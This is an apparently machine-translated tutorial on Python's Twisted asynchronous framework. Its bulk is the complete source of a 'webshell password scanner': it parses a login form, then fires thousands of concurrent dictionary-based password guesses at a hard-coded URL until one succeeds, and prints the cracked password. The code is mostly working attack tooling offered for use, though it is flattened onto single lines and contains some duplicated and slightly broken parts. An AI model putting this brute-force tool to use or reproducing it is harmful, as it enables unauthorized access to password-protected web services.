Tutorial on using Python Twisted framework to implement webshell password scanner

This article mainly introduces how to use Python's Twisted framework to implement webshell password scanner, and uses the asynchronous communication mechanism of the Twisted framework, if you want to learn iocp technology in windows for a long time, you can refer to it. However, after a long time studying other people's c ++ versions, you may find it too esoteric, it is a little difficult, but fortunately, the twisted technology in python is convenient for me.

Iocp is asynchronous communication technology, which is the most efficient option in windows systems. asynchronous communication, as its name suggests, is opposite to synchronous communication. we usually write similar socket. connect accept and so on all belong to this category. in python, urlopen is also synchronous (why is this mentioned because it is related to the specific implementation). In short, we usually write the vast majority of sockets, http communication is synchronized.

The synchronization program has the advantages of good thinking and good writing. We should have noticed all the disadvantages. for example, during the connect operation and recive operation, the program will be blocked and the process will not be able to continue until the last moment.

Asynchronous Processing is another way of thinking. it is similar to the sax method of xml parsing. In other words, when the program is faced with tasks such as conncet and recive, it will first execute other code, when the network communication has a result, the system will notify you and then call back the interrupted location.

The specific code is as follows. I will elaborate on it and summarize the technologies involved in the code below.

1. page parsing and automatic webshell password post will inevitably involve page parsing issues, that is, how to find and submit the appropriate input elements in the form on the page, including the value of hidden, password must be in combination with the dictionary. The specific implementation relies on SGMLParser

2. for normal page requests, I used urlopen (opener is used to use cookies). the snippets are as follows:

  cj = cookielib.CookieJar()   opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))   req = urllib2.Request(url, urllib.urlencode(bodyfieleds))     resp = opener.open(req, timeout=60)       strlist = resp.read() 

The code is simple. this is the charm of python. bodyfieleds is The post parameter and is a dictionary.

3. for asynchronous page requests, the getpage segment of twisted is used as follows:

  self.PostDATA[self.passw] = passl     #print temp   zs = getPage(self.url, method='POST', postdata=urllib.urlencode(self.PostDATA), headers=self.headers)   zs.addCallback(self.parse_page, self.url, passl).addErrback(self.fetch_error, self.url, passl)  

You can see how to use getPage to pass the Post parameter and header (the cookie is also contained in the anti-theft header)

And the custom Callback function, you can add and write the parameters you need to pass over. here I use url and pass

4. coroutine concurrency. the code is as follows:

    def InitTask(self):       for passl in self.passlist[:]:         d = self.addURL(passl)         yield d      def DoTask(self):       deferreds = []       coop = task.Cooperator()       work = self.InitTask()       for i in xrange(self.ThreadNum):         d = coop.coiterate(work)         deferreds.append(d)       dl = defer.DeferredList(deferreds) 

That's all. In terms of efficiency, I can send and receive approximately 16000 packets in 40 s with good network communication.

 # -*- coding: utf-8 -*-   #coding=utf-8         #   #   # code by icefish   # http://insight-labs.org/   # http://wcf1987.iteye.com/   #   from twisted.internet import iocpreactor   iocpreactor.install()   from twisted.web.client import getPage   from twisted.internet import defer, task   from twisted.internet import reactor   import os   from httplib import HTTPConnection   import urllib     import urllib2     import sys   import cookielib   import time     import threading   from Queue import LifoQueue   #import httplib2   from sgmllib import SGMLParser    import os   from httplib import HTTPConnection   import urllib     import urllib2     import sys   import cookielib   import time     import threading   from Queue import LifoQueue   from sgmllib import SGMLParser       class URLLister(SGMLParser):      def __init__(self):       SGMLParser.__init__(self)       self.input = {}     def start_input(self, attrs):        #print attrs              for k, v in attrs:         if k == 'type':           type = v         if k == 'name':           name = v         if k == 'value':           value = v       if type == 'hidden' and value != None:         self.input[name] = value       if type == 'password' :         self.input['icekey'] = name      class webShellPassScan(object):     def __init__(self, url, dict):       self.url = url       self.ThreadNum = 10       self.dict = dict     def getInput(self, url):       html, c = self.PostUrl(url, '')       parse = URLLister()       parse.feed(html)       return parse.input            def PostUrl(self, url, bodyfieleds):       try:                cj = cookielib.CookieJar()         opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))         req = urllib2.Request(url, urllib.urlencode(bodyfieleds))           resp = opener.open(req, timeout=60)                  strlist = resp.read()         cookies = []         for c in cj:           cookies.append(c.name + '=' + c.value)                  return strlist, cookies       except :              return ''               def parse_page(self, data, url, passk):       #print url              self.TestNum = self.TestNum + 1       if data != self.sret and len(data) != 0 and data != 'iceerror':         self.timeEnd = time.time()         print 'Scan Password End :' + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(self.timeEnd))         print 'total Scan Time:' + str((self.timeEnd - self.timeStart)), 's'         print 'total Scan Passwords:' + str(self.TestNum)         print "*************************the key pass***************************\n"         print passk          print "*************************the key pass***************************\n"         reactor.stop()                                          if self.TestNum % 1000 == 0:             #print TestNum             sys.stdout.write('detect Password Num:' + str(self.TestNum) + '\n')             sys.stdout.flush()           def fetch_error(self, error, url, passl):       self.addURL(passl)     def run(self):            self.timeStart = 0         self.timeEnd = 0         self.TestNum = 0         self.sret = ''         print '\n\ndetect the WebShell URL:' + self.url         self.PassNum = 0              self.timeStart = time.time()         print 'Scan Password Start :' + time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(self.timeStart))         filepath = os.path.abspath(os.curdir)         file = open(filepath + "\\" + self.dict)         self.passlist = []                  for lines in file:                 self.passlist.append(lines.strip())           #print lines.strip()          file.close()         PassNum = len(self.passlist)         print 'get passwords num:' + str(PassNum)                  inputdic = self.getInput(self.url)         self.passw = inputdic['icekey']         del inputdic['icekey']         self.PostDATA = dict({self.passw:'icekey'}, **inputdic)         self.sret, cookies = self.PostUrl(self.url, self.PostDATA)          self.headers = {'Content-Type':'application/x-www-form-urlencoded'}         self.headers['cookies'] = cookies         print 'cookies:' + str(cookies)                  self.DoTask()         #self.DoTask2()         #self.DoTask3()         print 'start run'         self.key = 'start'         reactor.run()              def InitTask(self):       for passl in self.passlist[:]:         d = self.addURL(passl)         yield d               def InitTask2(self):       for passl in self.passlist[:]:         d = self.sem.run(self.addURL, passl)         self.deferreds.append(d)              def InitTask3(self):       for passl in self.passlist[:]:         d = self.addURL(passl)               self.deferreds.append(d)        def DoTask(self):       deferreds = []       coop = task.Cooperator()       work = self.InitTask()       for i in xrange(self.ThreadNum):         d = coop.coiterate(work)         deferreds.append(d)       dl = defer.DeferredList(deferreds)       #dl.addErrback(self.errorCall)       #dl.addCallback(self.finish)            def DoTask2(self):              self.deferreds = []       self.sem = defer.DeferredSemaphore(self.ThreadNum)       self.InitTask2()       dl = defer.DeferredList(self.deferreds)               def DoTask3(self):                     self.deferreds = []          self.InitTask3()       dl = defer.DeferredList(self.deferreds)            def addURL(self, passl):              self.PostDATA[self.passw] = passl         #print temp       zs = getPage(self.url, method='POST', postdata=urllib.urlencode(self.PostDATA), headers=self.headers)       zs.addCallback(self.parse_page, self.url, passl).addErrback(self.fetch_error, self.url, passl)             return zs         a = webShellPassScan('http://192.168.0.2:8080/f15.jsp', 'source_new.txt')   a.run()